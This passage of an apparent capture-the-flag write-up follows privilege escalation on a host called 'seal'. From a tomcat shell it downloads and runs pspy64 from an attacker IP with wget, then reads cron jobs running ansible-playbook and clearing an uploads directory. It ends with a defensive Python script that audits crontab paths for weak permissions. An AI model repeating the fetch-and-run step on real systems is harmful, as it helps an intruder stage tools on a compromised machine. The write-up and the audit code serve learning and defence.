PSPY
Several root cron job processes were discovered
tomcat@seal:/tmp$ wget http://10.10.14.7/pspy64 ; chmod 755 ./pspy64
--2023-04-11 14:48:04-- http://10.10.14.7/pspy64
Connecting to 10.10.14.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================================================>] 2.96M 1.60MB/s in 1.9s
2023-04-11 14:48:06 (1.60 MB/s) - ‘pspy64’ saved [3104768/3104768]
Delivery complete
tomcat@seal:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
ansible-playbook
One of the root cron job processes is executing the binary /usr/bin/ansible-playbook with the playbook file /opt/backups/playbook/run.yml, running with the privileges of the luis user.
It then performs a series of further executions.
This operation is repeated every minute.
Continuing
Delete?
The other root cron job process is also removing everything in the /admin/dashboard/uploads directory of the Tomcat instance.
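What makes these two root jobs worth a second look from the defender's side is the same question each time: can any file a root job reads, or any directory on the path to it, be altered by a less privileged user? The Python script below is an added example, not part of this writeup and not part of pspy or Ansible. It parses system-crontab-style lines, extracts the absolute paths each command references, and reports files or parent directories that are owned by an untrusted uid or carry group or world write bits. The crontab entries, the demo directory tree, the rebased `/usr/bin/ansible-playbook` and `run.yml` paths and the `rotate.sh` control case are all constructed for the demonstration; only the names echo the page's findings.

```python
import os
import stat
import tempfile
from pathlib import Path


def referenced_paths(command):
    """Return the absolute paths a cron command references (tokens starting with '/').
    A trailing glob such as 'uploads/*' is reduced to the directory it expands in."""
    paths = []
    for tok in command.split():
        if tok.startswith("/"):
            paths.append(tok.rstrip("*").rstrip("/") or "/")
    return paths


def weak_permissions(path, trusted_uids=frozenset({0}), stop_at="/"):
    """List reasons why `path`, or a directory leading to it, could be altered by an
    untrusted user: ownership outside `trusted_uids`, or group/world write bits.
    The walk up the tree stops before `stop_at` (the trusted boundary)."""
    reasons = []
    target = Path(path)
    stop = Path(stop_at)
    for node in [target, *target.parents]:
        if node == stop:
            break
        try:
            st = node.lstat()
        except FileNotFoundError:
            # A missing file still matters if its parent is writable, so keep
            # walking upwards instead of giving up here.
            continue
        if st.st_uid not in trusted_uids:
            reasons.append(f"{node}: owned by uid {st.st_uid}, not trusted")
        if st.st_mode & stat.S_IWOTH:
            reasons.append(f"{node}: world-writable")
        elif st.st_mode & stat.S_IWGRP:
            reasons.append(f"{node}: group-writable")
    return reasons


def audit_crontab(text, trusted_uids=frozenset({0}), stop_at="/"):
    """Audit system-crontab lines (minute hour dom month dow user command) and map
    each command that touches a weakly protected path to its list of reasons."""
    findings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        command = fields[6]
        reasons = []
        for p in referenced_paths(command):
            reasons.extend(weak_permissions(p, trusted_uids, stop_at))
        if reasons:
            findings[command] = reasons
    return findings


def default_trusted_uids():
    """root plus the current user, so the demo behaves the same with or without sudo."""
    return frozenset({0, os.getuid()})


def build_demo_tree():
    """Constructed demo tree: the playbook is group-writable (the weak case), the
    maintenance script and every directory are 0755 (the safe case)."""
    base = Path(tempfile.mkdtemp(prefix="cron-audit-"))
    for rel in ("usr/bin", "opt/backups/playbook", "safe/bin"):
        d = base / rel
        d.mkdir(parents=True)
        for node in [d, *d.parents]:
            if node == base:
                break
            os.chmod(node, 0o755)
    for rel in ("usr/bin/ansible-playbook", "safe/bin/rotate.sh"):
        f = base / rel
        f.write_text("#!/bin/sh\nexit 0\n")
        os.chmod(f, 0o755)
    playbook = base / "opt/backups/playbook/run.yml"
    playbook.write_text("- hosts: localhost\n  tasks: []\n")
    os.chmod(playbook, 0o664)  # group-writable: the finding the audit should raise
    return base


def demo_crontab(base):
    """Constructed entries modelled on the pspy observation; paths are rebased under
    the demo tree so the audit runs offline and touches nothing on the real system."""
    return (
        "# constructed sample, not a real crontab\n"
        f"* * * * * root {base}/usr/bin/ansible-playbook {base}/opt/backups/playbook/run.yml\n"
        f"* * * * * root {base}/safe/bin/rotate.sh\n"
    )


def main():
    base = build_demo_tree()
    for command, reasons in audit_crontab(demo_crontab(base), default_trusted_uids(), base).items():
        print(command)
        for r in reasons:
            print("   ", r)


if __name__ == "__main__":
    main()
```

Run against a real `/etc/crontab` or `/etc/cron.d/*` with the default `trusted_uids` and `stop_at="/"`, the same functions flag any job whose script, playbook or data directory a non-root account could swap out before the next minute's run; the `stop_at` boundary exists only so the demo stays confined to its temporary tree.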